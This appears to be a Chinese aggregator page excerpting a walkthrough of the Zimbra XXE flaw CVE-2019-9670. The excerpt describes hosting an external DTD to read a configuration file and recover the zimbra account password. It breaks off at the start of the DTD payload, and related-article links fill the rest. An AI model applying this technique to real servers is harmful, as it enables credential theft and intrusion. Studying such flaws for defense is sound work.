Zimbra
第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问。为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件。 上图中用红框圈起来的就是zimbra账号的密码,先记下来以后会用到。 dtd文件内容如下: 1 <!ENTITY % file SYSTEM "fil
相关文章
- 1. Zimbra
- 2. Zimbra安装
- 3. Zimbra是什么?
- 4. zimbra邮件系统
- 5. Centos 7.6 Install zimbra 8.6
- 6. zimbra安装指南
- 7. zimbra rce 漏洞复现
- 8. zimbra修改记录分享
- 9. centos7安装zimbra邮件
- 10. zimbra明文密码登陆
- 更多相关文章...
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 在windows下的虚拟机中,安装华为电脑的deepin操作系统
- 2. 强烈推荐款下载不限速解析神器
- 3. 【区块链技术】孙宇晨:区块链技术带来金融服务的信任变革
- 4. 搜索引起的链接分析-计算网页的重要性
- 5. TiDB x 微众银行 | 耗时降低 58%,分布式架构助力实现普惠金融
- 6. 《数字孪生体技术白皮书》重磅发布(附完整版下载)
- 7. 双十一“避坑”指南:区块链电子合同为电商交易保驾护航!
- 8. 区块链产业,怎样“链”住未来?
- 9. OpenglRipper使用教程
- 10. springcloud请求一次好用一次不好用zuul Name or service not known
欢迎关注本站公众号,获取更多信息
相关文章
- 1. Zimbra
- 2. Zimbra安装
- 3. Zimbra是什么?
- 4. zimbra邮件系统
- 5. Centos 7.6 Install zimbra 8.6
- 6. zimbra安装指南
- 7. zimbra rce 漏洞复现
- 8. zimbra修改记录分享
- 9. centos7安装zimbra邮件
- 10. zimbra明文密码登陆